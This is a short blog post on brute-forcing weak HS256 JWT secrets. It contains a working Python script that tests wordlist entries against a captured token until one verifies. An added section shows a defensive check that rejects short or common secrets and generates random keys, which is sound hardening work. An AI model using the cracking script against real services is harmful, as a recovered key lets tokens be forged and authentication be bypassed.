Brute-forcing weak JWT keys

探头的新芽 2022-04-27 53 views

Not reproduced yet; just looking at the approach.

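>pip3 install pyjwt termcolor
>python3 crack.py
import jwt
import termcolor

jwt_str = R'token'  # the JWT under test
with open('/root/password.txt') as f:
    for line in f:
        key_ = line.strip()
        try:
            # PyJWT 2.x requires an explicit algorithm list and no longer takes verify=;
            # HS256 is assumed here, adjust it to the "alg" in the token header.
            jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
            print('\r', '\bfound key -->', termcolor.colored(key_, 'green'), '<--')
            break
        except (jwt.exceptions.ExpiredSignatureError,
                jwt.exceptions.InvalidAudienceError,
                jwt.exceptions.InvalidIssuedAtError,
                jwt.exceptions.ImmatureSignatureError):
            # The signature verified and only a claim check failed, so the key is correct.
            print('\r', '\bfound key -->', termcolor.colored(key_, 'green'), '<--')
            break
        except jwt.exceptions.InvalidSignatureError:
            # Wrong key: show progress on one line and move on to the next candidate.
            print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
            continue
    else:
        # for/else: runs only when the loop finished without a break.
        print('\r', '\bnot found.')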

Reference: https://github.com/xiaoy-sec/Pentest_Note#%E6%B0%B4%E5%9D%91%E6%94%BB%E5%87%BB
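
The wordlist loop above only succeeds when the HS256 secret is guessable. A service-side startup check that rejects such secrets, as an added example that is not part of the original post: the function names, the sample denylist and the token are constructed for illustration, and the 32-byte minimum follows RFC 7518 section 3.2.

```python
import base64, hashlib, hmac, json, secrets

MIN_HS256_KEY_BYTES = 32  # RFC 7518 s3.2: key at least as long as the SHA-256 output

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(claims: dict, key: bytes) -> str:
    """Build a compact HS256 JWT with the standard library only."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"

def verify_hs256(token: str, key: bytes) -> bool:
    """Recompute the HMAC over header.payload and compare in constant time."""
    signing_input, _, sig = token.rpartition(".")
    expected = b64url(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())
    return hmac.compare_digest(expected, sig)

def audit_secret(key: bytes, denylist) -> list:
    """Return the reasons a configured secret must be rejected (empty list = acceptable)."""
    problems = []
    if len(key) < MIN_HS256_KEY_BYTES:
        problems.append(f"only {len(key)} bytes, HS256 needs >= {MIN_HS256_KEY_BYTES}")
    if key in denylist:
        problems.append("present in a common-password list")
    return problems

def new_secret() -> bytes:
    """Generate a secret from the OS CSPRNG instead of a human-chosen string."""
    return secrets.token_bytes(MIN_HS256_KEY_BYTES)

# Constructed sample data: a tiny denylist and a token signed with a weak secret.
COMMON = {b"secret", b"123456", b"password"}
weak_token = sign_hs256({"sub": "alice"}, b"secret")

if __name__ == "__main__":
    # Verification needs nothing but the token, so a guessable secret can be
    # confirmed offline; the audit refuses it before the service starts.
    print("weak secret verifies:", verify_hs256(weak_token, b"secret"))
    print("audit of weak secret:", audit_secret(b"secret", COMMON))
    print("audit of new secret: ", audit_secret(new_secret(), COMMON))
```
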
